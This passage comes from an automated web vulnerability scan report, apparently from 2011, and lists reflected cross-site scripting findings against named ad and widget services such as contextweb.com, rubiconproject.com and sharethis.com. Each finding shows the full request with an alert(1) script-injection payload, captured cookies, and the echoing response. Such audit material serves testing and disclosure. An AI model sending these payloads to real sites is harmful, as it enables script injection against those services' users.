User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90e3593";alert(1)//afb37673b17";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var
...[SNIP]...

3.75. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d35e5"%3balert(1)//a722bf372ca was submitted in the cwpid parameter. This input was echoed as d35e5";alert(1)//a722bf372ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156d35e5"%3balert(1)//a722bf372ca&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156d35e5";alert(1)//a722bf372ca";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase()
...[SNIP]...

3.76. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f670"%3balert(1)//bf6a463a257 was submitted in the cwpnet parameter. This input was echoed as 2f670";alert(1)//bf6a463a257 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=12f670"%3balert(1)//bf6a463a257&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB27
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="101378";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="12f670";alert(1)//bf6a463a257";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

3.77. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83ac"%3balert(1)//31573316bfa was submitted in the cwrun parameter. This input was echoed as e83ac";alert(1)//31573316bfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200e83ac"%3balert(1)//31573316bfa&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 17:06:12 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:14 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:54 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD";var cr="200e83ac";alert(1)//31573316bfa";var cw="728";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

3.78. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65341"%3balert(1)//c8426144146 was submitted in the cwtagid parameter. This input was echoed as 65341";alert(1)//c8426144146 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=10137865341"%3balert(1)//c8426144146 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB20
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="536156";var ct="10137865341";alert(1)//c8426144146";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _n
...[SNIP]...

3.79. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e2be"%3balert(1)//bd79ae61eda was submitted in the cwwidth parameter. This input was echoed as 5e2be";alert(1)//bd79ae61eda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536156&cwwidth=7285e2be"%3balert(1)//bd79ae61eda&cwheight=90&cwpnet=1&cwtagid=101378 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP200
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 06 May 02011 18:48:15 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5918
Date: Mon, 09 May 2011 14:00:15 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 09-May-2011 16:46:55 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536156";var cwtagid="101378";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="7285e2be";alert(1)//bd79ae61eda";var ch="90";var cads="0";var cp="536156";var ct="101378";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1]
...[SNIP]...

3.80. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload c1b45*/alert(1)//4e36c7fd6db was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/rubicon/page_parser.js?d=www.thevine.com.auc1b45*/alert(1)//4e36c7fd6db HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7856/12590; ses2=12590^2&13549^1; csi2=3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; cd=false

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 14:07:09 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 15:07:09 GMT
Date: Mon, 09 May 2011 14:07:09 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17446


/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/com.auc1b45*/alert(1)//4e36c7fd6db/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

3.81. http://wd.sharethis.com/api/getCount2.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 633ac<script>alert(1)</script>676868d91db was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCB633ac<script>alert(1)</script>676868d91db&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 287

stButtons.processCB633ac<script>alert(1)</script>676868d91db({"url":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story","email":9,"total":9,"ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20
...[SNIP]...

3.82. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1d9d<img%20src%3da%20onerror%3dalert(1)>e9e0ca7772 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1d9d<img src=a onerror=alert(1)>e9e0ca7772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.s/b1d9d<img%20src%3da%20onerror%3dalert(1)>e9e0ca7772tory HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 208

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509,0,6839926.s\/b1d9d<img src=a onerror=alert(1)>e9e0ca7772tory"});

3.83. http://wd.sharethis.com/api/getCount2.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload d4b86<img%20src%3da%20onerror%3dalert(1)>9ec8cdb2a15 was submitted in the url parameter. This input was echoed as d4b86<img src=a onerror=alert(1)>9ec8cdb2a15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.storyd4b86<img%20src%3da%20onerror%3dalert(1)>9ec8cdb2a15 HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 207

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509,0,6839926.storyd4b86<img src=a onerror=alert(1)>9ec8cdb2a15"});

3.84. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.surphace.com
Path:   /partner/omniture/sphereomni_api.php

Issue detail

The value of the evt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d439c"%3balert(1)//cf3d692bcc5 was submitted in the evt parameter. This input was echoed as d439c";alert(1)//cf3d692bcc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/omniture/sphereomni_api.php?siteid=tribune_orlandosentinel&evt=fireSphereOmInitActiond439c"%3balert(1)//cf3d692bcc5&omid=501482 HTTP/1.1
Host: widgets.surphace.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Machine: web22
Content-Type: text/html
x-forwarded-for: 173.193.214.243
Content-Length: 11103
Date: Mon, 09 May 2011 14:00:08 GMT
X-Varnish: 730031054
Age: 0
